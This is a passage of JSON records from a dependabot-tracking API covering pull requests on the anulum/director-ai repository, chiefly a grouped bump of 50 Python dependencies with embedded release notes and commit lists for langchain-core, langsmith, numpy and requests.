href=\"https://redirect.github.com/langchain-ai/langchain/issues/37922\"\u003e#37922\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/053c368ba438ca077f1348147fadc5dad16d6898\"\u003e\u003ccode\u003e053c368\u003c/code\u003e\u003c/a\u003e fix(core): remove Bedrock prevalidation from \u003ccode\u003eload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37909\"\u003e#37909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/0993edba86014788827144c175499755ec5b9f55\"\u003e\u003ccode\u003e0993edb\u003c/code\u003e\u003c/a\u003e chore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37916\"\u003e#37916\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/6f7c8f54454ae45b07ca274cbfbb0afb8cef9041\"\u003e\u003ccode\u003e6f7c8f5\u003c/code\u003e\u003c/a\u003e chore: bump starlette from 0.49.1 to 1.0.1 in /libs/langchain (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37899\"\u003e#37899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/586bcd46a17be1eafc61127460d766b2a0611db3\"\u003e\u003ccode\u003e586bcd4\u003c/code\u003e\u003c/a\u003e docs(core): expand and link \u003ccode\u003eModelProfile\u003c/code\u003e docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37904\"\u003e#37904\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/9eab5237ccf7878648b2d33108a7f7e15331c452\"\u003e\u003ccode\u003e9eab523\u003c/code\u003e\u003c/a\u003e chore: bump requests from 2.34.0 to 2.34.2 in /libs/partners/xai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37903\"\u003e#37903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/be2e8f70bc472354f23e9f62519427dd2de7d332\"\u003e\u003ccode\u003ebe2e8f7\u003c/code\u003e\u003c/a\u003e ci(infra): add \u003ccode\u003eexclude\u003c/code\u003e input to skip libs in scheduled integration tests (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/3b999176c84c1236e1f6fbaa5194782360e82264\"\u003e\u003ccode\u003e3b99917\u003c/code\u003e\u003c/a\u003e test(langchain,partners): disable pytest-benchmark under xdist to silence `Py...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/34af59c1a69c403d7b34d0bbd9ceffd287e3b0ed\"\u003e\u003ccode\u003e34af59c\u003c/code\u003e\u003c/a\u003e fix(partners): cap aiohttp below 3.14 for vcrpy compat (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37898\"\u003e#37898\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/414d7b8e94fca5102e87a1f7a6c70e32622a85b9\"\u003e\u003ccode\u003e414d7b8\u003c/code\u003e\u003c/a\u003e chore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37895\"\u003e#37895\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langchain/compare/langchain-core==1.4.0...langchain-core==1.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langsmith` from 0.8.4 to 0.8.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/releases\"\u003elangsmith's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.9\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat(sandbox): add JS Dockerfile snapshots by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2951\"\u003elangchain-ai/langsmith-sdk#2951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump the js-minor-and-patch group across 1 directory with 11 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2931\"\u003elangchain-ai/langsmith-sdk#2931\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump websockets from 15.0.1 to 16.0 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2811\"\u003elangchain-ai/langsmith-sdk#2811\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): update myst-parser requirement from \u0026gt;=3 to \u0026gt;=4.0.1 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2841\"\u003elangchain-ai/langsmith-sdk#2841\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump the py-minor-and-patch group across 1 directory with 19 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2934\"\u003elangchain-ai/langsmith-sdk#2934\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump typescript from 5.9.3 to 6.0.3 in /js by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2839\"\u003elangchain-ai/langsmith-sdk#2839\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump google-adk from 1.10.0 to 2.1.0 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2960\"\u003elangchain-ai/langsmith-sdk#2960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump wrapt from 1.17.3 to 2.2.1 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2961\"\u003elangchain-ai/langsmith-sdk#2961\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump the py-minor-and-patch group in /python with 6 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2958\"\u003elangchain-ai/langsmith-sdk#2958\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump ...\n\n_Description has been truncated_","html_url":"https://github.com/anulum/director-ai/pull/87","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/anulum%2Fdirector-ai/issues/87","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/87/packages"},{"uuid":"4607089172","node_id":"PR_kwDORQ8Eq87jnIhL","number":77,"state":"closed","title":"chore(deps): bump the python-minor-patch group with 50 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":5,"pull_request":true,"closed_at":"2026-06-07T22:06:57.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-07T11:09:48.000Z","updated_at":"2026-06-07T22:08:20.000Z","time_to_close":39429,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"python-minor-patch","update_count":50,"packages":[{"name":"numpy","old_version":"2.4.4","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"torch","old_version":"2.11.0","new_version":"2.12.0","repository_url":"https://github.com/pytorch/pytorch"},{"name":"transformers","old_version":"5.7.0","new_version":"5.10.2","repository_url":"https://github.com/huggingface/transformers"},{"name":"sentence-transformers","old_version":"5.4.1","new_version":"5.5.1","repository_url":"https://github.com/huggingface/sentence-transformers"},{"name":"openai","old_version":"2.32.0","new_version":"2.41.0","repository_url":"https://github.com/openai/openai-python"},{"name":"anthropic","old_version":"0.96.0","new_version":"0.107.0","repository_url":"https://github.com/anthropics/anthropic-sdk-python"},{"name":"langchain-core","old_version":"1.4.0","new_version":"1.4.1","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langsmith","old_version":"0.8.4","new_version":"0.8.9","repository_url":"https://github.com/langchain-ai/langsmith-sdk"},{"name":"llama-index-core","old_version":"0.14.20","new_version":"0.14.22","repository_url":"https://github.com/run-llama/llama_index"},{"name":"fastapi","old_version":"0.136.0","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"pydantic","old_version":"2.13.1","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"python-multipart","old_version":"0.0.28","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"elevenlabs","old_version":"2.43.0","new_version":"2.51.0","repository_url":"https://github.com/elevenlabs/elevenlabs-python"},{"name":"onnxruntime","old_version":"1.22.0","new_version":"1.26.0","repository_url":"https://github.com/microsoft/onnxruntime"},{"name":"onnxruntime-gpu","old_version":"1.24.4","new_version":"1.26.0","repository_url":"https://github.com/microsoft/onnxruntime"},{"name":"grpcio","old_version":"1.78.0","new_version":"1.81.0","repository_url":"https://github.com/grpc/grpc"},{"name":"grpcio-tools","old_version":"1.78.0","new_version":"1.81.0","repository_url":"https://github.com/grpc/grpc"},{"name":"mujoco","old_version":"3.8.0","new_version":"3.9.0","repository_url":"https://github.com/google-deepmind/mujoco"},{"name":"scikit-learn","old_version":"1.6.1","new_version":"1.9.0","repository_url":"https://github.com/scikit-learn/scikit-learn"},{"name":"weaviate-client","old_version":"4.20.5","new_version":"4.16.2","repository_url":"https://github.com/weaviate/weaviate-python-client"},{"name":"qdrant-client","old_version":"1.17.1","new_version":"1.18.0","repository_url":"https://github.com/qdrant/qdrant-client"},{"name":"faiss-cpu","old_version":"1.13.2","new_version":"1.14.2","repository_url":"https://github.com/facebookresearch/faiss"},{"name":"polar-sdk","old_version":"0.31.3","new_version":"0.31.5","repository_url":"https://github.com/polarsource/polar-python"},{"name":"langgraph","old_version":"1.1.6","new_version":"1.2.4","repository_url":"https://github.com/langchain-ai/langgraph"},{"name":"haystack-ai","old_version":"2.27.0","new_version":"2.30.0","repository_url":"https://github.com/deepset-ai/haystack"},{"name":"litellm","old_version":"1.86.2","new_version":"1.88.0","repository_url":"https://github.com/BerriAI/litellm"},{"name":"mkdocs-jupyter","old_version":"0.26.2","new_version":"0.26.3","repository_url":"https://github.com/danielfrg/mkdocs-jupyter"},{"name":"opentelemetry-api","old_version":"1.41.0","new_version":"1.42.1","repository_url":"https://github.com/open-telemetry/opentelemetry-python"},{"name":"langfuse","old_version":"4.3.1","new_version":"4.7.1","repository_url":"https://github.com/langfuse/langfuse"},{"name":"gradio","old_version":"6.13.0","new_version":"6.16.0","repository_url":"https://github.com/gradio-app/gradio"},{"name":"pypdf","old_version":"6.10.2","new_version":"6.13.0","repository_url":"https://github.com/py-pdf/pypdf"},{"name":"boto3","old_version":"1.42.90","new_version":"1.43.24","repository_url":"https://github.com/boto/boto3"},{"name":"notion-client","old_version":"3.0.0","new_version":"3.1.0","repository_url":"https://github.com/ramnes/notion-sdk-py"},{"name":"google-api-python-client","old_version":"2.194.0","new_version":"2.197.0","repository_url":"https://github.com/googleapis/google-api-python-client"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"psycopg2-binary","old_version":"2.9.11","new_version":"2.9.12","repository_url":"https://github.com/psycopg/psycopg2"},{"name":"google-cloud-aiplatform","old_version":"1.149.0","new_version":"1.156.0","repository_url":"https://github.com/googleapis/python-aiplatform"},{"name":"hypothesis","old_version":"6.151.10","new_version":"6.155.2","repository_url":"https://github.com/HypothesisWorks/hypothesis"},{"name":"pytest-asyncio","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/pytest-dev/pytest-asyncio"},{"name":"ruff","old_version":"0.15.11","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"},{"name":"build","old_version":"1.4.3","new_version":"1.5.0","repository_url":"https://github.com/pypa/build"},{"name":"aiohappyeyeballs","old_version":"2.6.1","new_version":"2.6.2","repository_url":"https://github.com/aio-libs/aiohappyeyeballs"},{"name":"anyio","old_version":"4.12.1","new_version":"4.13.0","repository_url":"https://github.com/agronholm/anyio"},{"name":"certifi","old_version":"2026.2.25","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"huggingface-hub","old_version":"1.12.0","new_version":"1.18.0","repository_url":"https://github.com/huggingface/huggingface_hub"},{"name":"idna","old_version":"3.15","new_version":"3.18","repository_url":"https://github.com/kjd/idna"},{"name":"propcache","old_version":"0.4.1","new_version":"0.5.2","repository_url":"https://github.com/aio-libs/propcache"},{"name":"discord-py","old_version":"2.5.2","new_version":"2.7.1","repository_url":"https://github.com/Rapptz/discord.py"}],"path":null,"ecosystem":"pip"},"body":"Bumps the python-minor-patch group with 50 updates:\n\n| Package | From | To |\n| --- | --- | --- |\n| [numpy](https://github.com/numpy/numpy) | `2.4.4` | `2.4.6` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [torch](https://github.com/pytorch/pytorch) | `2.11.0` | `2.12.0` |\n| [transformers](https://github.com/huggingface/transformers) | `5.7.0` | `5.10.2` |\n| [sentence-transformers](https://github.com/huggingface/sentence-transformers) | `5.4.1` | `5.5.1` |\n| [openai](https://github.com/openai/openai-python) | `2.32.0` | `2.41.0` |\n| [anthropic](https://github.com/anthropics/anthropic-sdk-python) | `0.96.0` | `0.107.0` |\n| [langchain-core](https://github.com/langchain-ai/langchain) | `1.4.0` | `1.4.1` |\n| [langsmith](https://github.com/langchain-ai/langsmith-sdk) | `0.8.4` | `0.8.9` |\n| [llama-index-core](https://github.com/run-llama/llama_index) | `0.14.20` | `0.14.22` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.136.0` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.49.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.13.1` | `2.13.4` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.28` | `0.0.32` |\n| [elevenlabs](https://github.com/elevenlabs/elevenlabs-python) | `2.43.0` | `2.51.0` |\n| [onnxruntime](https://github.com/microsoft/onnxruntime) | `1.22.0` | `1.26.0` |\n| [onnxruntime-gpu](https://github.com/microsoft/onnxruntime) | `1.24.4` | `1.26.0` |\n| [grpcio](https://github.com/grpc/grpc) | `1.78.0` | `1.81.0` |\n| [grpcio-tools](https://github.com/grpc/grpc) | `1.78.0` | `1.81.0` |\n| [mujoco](https://github.com/google-deepmind/mujoco) | `3.8.0` | `3.9.0` |\n| [scikit-learn](https://github.com/scikit-learn/scikit-learn) | `1.6.1` | `1.9.0` |\n| [weaviate-client](https://github.com/weaviate/weaviate-python-client) | `4.20.5` | `4.16.2` |\n| [qdrant-client](https://github.com/qdrant/qdrant-client) | `1.17.1` | `1.18.0` |\n| [faiss-cpu](https://github.com/facebookresearch/faiss) | `1.13.2` | `1.14.2` |\n| [polar-sdk](https://github.com/polarsource/polar-python) | `0.31.3` | `0.31.5` |\n| [langgraph](https://github.com/langchain-ai/langgraph) | `1.1.6` | `1.2.4` |\n| [haystack-ai](https://github.com/deepset-ai/haystack) | `2.27.0` | `2.30.0` |\n| [litellm](https://github.com/BerriAI/litellm) | `1.86.2` | `1.88.0` |\n| [mkdocs-jupyter](https://github.com/danielfrg/mkdocs-jupyter) | `0.26.2` | `0.26.3` |\n| [opentelemetry-api](https://github.com/open-telemetry/opentelemetry-python) | `1.41.0` | `1.42.1` |\n| [langfuse](https://github.com/langfuse/langfuse) | `4.3.1` | `4.7.1` |\n| [gradio](https://github.com/gradio-app/gradio) | `6.13.0` | `6.16.0` |\n| [pypdf](https://github.com/py-pdf/pypdf) | `6.10.2` | `6.13.0` |\n| [boto3](https://github.com/boto/boto3) | `1.42.90` | `1.43.24` |\n| [notion-client](https://github.com/ramnes/notion-sdk-py) | `3.0.0` | `3.1.0` |\n| [google-api-python-client](https://github.com/googleapis/google-api-python-client) | `2.194.0` | `2.197.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [psycopg2-binary](https://github.com/psycopg/psycopg2) | `2.9.11` | `2.9.12` |\n| [google-cloud-aiplatform](https://github.com/googleapis/python-aiplatform) | `1.149.0` | `1.156.0` |\n| [hypothesis](https://github.com/HypothesisWorks/hypothesis) | `6.151.10` | `6.155.2` |\n| [pytest-asyncio](https://github.com/pytest-dev/pytest-asyncio) | `1.3.0` | `1.4.0` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.11` | `0.15.16` |\n| [build](https://github.com/pypa/build) | `1.4.3` | `1.5.0` |\n| [aiohappyeyeballs](https://github.com/aio-libs/aiohappyeyeballs) | `2.6.1` | `2.6.2` |\n| [anyio](https://github.com/agronholm/anyio) | `4.12.1` | `4.13.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2026.2.25` | `2026.5.20` |\n| [huggingface-hub](https://github.com/huggingface/huggingface_hub) | `1.12.0` | `1.18.0` |\n| [idna](https://github.com/kjd/idna) | `3.15` | `3.18` |\n| [propcache](https://github.com/aio-libs/propcache) | `0.4.1` | `0.5.2` |\n| [discord-py](https://github.com/Rapptz/discord.py) | `2.5.2` | `2.7.1` |\n\nUpdates `numpy` from 2.4.4 to 2.4.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/numpy/numpy/releases\"\u003enumpy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.4.6 (May 18, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.6 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.6 is a quick release that fixes a regression discovered in the 2.4.5\nrelease.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 4 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e!EarlMilktea\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eSebastian Berg\u003c/li\u003e\n\u003cli\u003eWarren Weckesser\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePull requests merged\u003c/h2\u003e\n\u003cp\u003eA total of 4 pull requests were merged for this release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31444\"\u003e#31444\u003c/a\u003e: MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31453\"\u003e#31453\u003c/a\u003e: BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31459\"\u003e#31459\u003c/a\u003e: BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31460\"\u003e#31460\u003c/a\u003e: BUG: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator...\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.4.5 (May 15, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.5 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.5 is a patch release that fixes bugs discovered after the 2.4.4\nrelease, has some typing improvements, and maintains infrastructure.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 17 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAleksei Nikiforov\u003c/li\u003e\n\u003cli\u003eAnarion Zuo +\u003c/li\u003e\n\u003cli\u003eAnkit Ahlawat\u003c/li\u003e\n\u003cli\u003eBreno Favaretto +\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eIgor Krivenko +\u003c/li\u003e\n\u003cli\u003eIjtihed Kilani +\u003c/li\u003e\n\u003cli\u003eJoren Hammudoglu\u003c/li\u003e\n\u003cli\u003eMaarten Baert +\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/b832a09cf2a169c833dd2371e7c07aa00b293242\"\u003e\u003ccode\u003eb832a09\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31462\"\u003e#31462\u003c/a\u003e from charris/prepare-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/57cc147d2ceacffc6534642bfbdebb3a80428e1e\"\u003e\u003ccode\u003e57cc147\u003c/code\u003e\u003c/a\u003e REL: Prepare for the NumPy 2.4.6 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/0c72b0b53b6b83c004e434b2c7855e73c000d21e\"\u003e\u003ccode\u003e0c72b0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31459\"\u003e#31459\u003c/a\u003e from charris/backport-31347\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/9778d26e0475d381ccb7817c3b4dd8cacef2b9eb\"\u003e\u003ccode\u003e9778d26\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/e0e38767d5d0f848ab44befeedcad71e8ef589c7\"\u003e\u003ccode\u003ee0e3876\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/d1bffeb9ec4ec0bf029c94ea35abffa92d5c30f2\"\u003e\u003ccode\u003ed1bffeb\u003c/code\u003e\u003c/a\u003e BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary \u003ccode\u003evh\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31347\"\u003e#31347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/8d8d7e5a14a1da0bfb0faf609a7a7610c431e6e9\"\u003e\u003ccode\u003e8d8d7e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31453\"\u003e#31453\u003c/a\u003e from seberg/issue-31452\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/bddaab7ace45f90148d8f2bb6e67daab2d45ec76\"\u003e\u003ccode\u003ebddaab7\u003c/code\u003e\u003c/a\u003e BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/37a1ecca8dff09b2c579a991194ac55b9971f3a7\"\u003e\u003ccode\u003e37a1ecc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31444\"\u003e#31444\u003c/a\u003e from charris/begin-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/3c0e043217a759a8a948ade158fec14348c3b459\"\u003e\u003ccode\u003e3c0e043\u003c/code\u003e\u003c/a\u003e MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/numpy/numpy/compare/v2.4.4...v2.4.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.33.1 to 2.34.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.34.2\u003c/h2\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues with \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling \u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.1\u003c/h2\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/k223kim\"\u003e\u003ccode\u003e@​k223kim\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/psf/requests/pull/7433\"\u003epsf/requests#7433\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.0\u003c/h2\u003e\n\u003ch2\u003e2.34.0 